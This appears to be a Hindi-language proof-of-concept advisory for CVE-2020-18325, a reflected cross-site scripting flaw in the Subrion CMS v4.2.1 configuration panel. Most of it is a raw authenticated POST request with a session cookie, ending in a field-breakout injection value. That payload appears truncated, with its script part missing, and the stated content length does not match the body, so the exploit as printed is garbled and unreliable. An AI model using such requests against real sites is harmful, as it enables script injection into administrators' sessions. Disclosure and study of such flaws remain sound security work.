
Subrion CMS v4.2.1 कॉन्फ़िगरेशन पैनल में प्रतिबिंबित XSS भेद्यता के लिए प्रूफ-ऑफ-कॉन्सेप्ट शोषण, POST अनुरोधों के माध्यम से JavaScript इंजेक्शन प्रदर्शित करता है।
Subrion CMS को इंस्टॉल करना आसान और प्रबंधित करना सरल है। इसका उपयोग एक स्वतंत्र एप्लिकेशन के रूप में या अन्य एप्लिकेशनों के साथ मिलकर एंट्री-लेवल साइट्स, मध्यम आकार या बड़ी साइट्स बनाने के लिए करें।
Subrion CMS v.4.2.1 के कॉन्फ़िगरेशन पैनल में कई रिफ्लेक्टेड क्रॉस-साइट स्क्रिप्टिंग कमजोरियाँ पाई गईं, जो एक दूरस्थ हमलावर को मनमाना JavaScript इंजेक्ट करने की अनुमति देती हैं।
दिनांक: 27-02-2022
सॉफ्टवेयर लिंक: https://subrion.org
एक्सप्लॉइट लेखक: HaMM0nz
CVE: CVE-2020-18325
श्रेणी: वेब एप्लिकेशन
प्रभावित URL
POST /panel/configuration/pictures/ HTTP/1.1
Host: 172.16.63.129
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.16.63.129/panel/configuration/pictures/
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623
Content-Length: 5605
Connection: close
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded
Upgrade-Insecure-Requests: 1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="__st"
t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[image_quality]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[image_quality]"
75
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="c[allow_animated_gifs]"
1
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
0
-----------------------------17647740521660843247800008623
Content-Disposition: form-data; name="v[allow_animated_gifs]"
test">1qazx
खोज और रिपोर्ट : 24 जून 2019
CVE ID आवंटित : 11 अगस्त 2021
सार्वजनिक : 27 फरवरी 2022
OWASP के XSS रोकथाम दिशानिर्देशों का अनुपालन करने पर विचार करें। (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)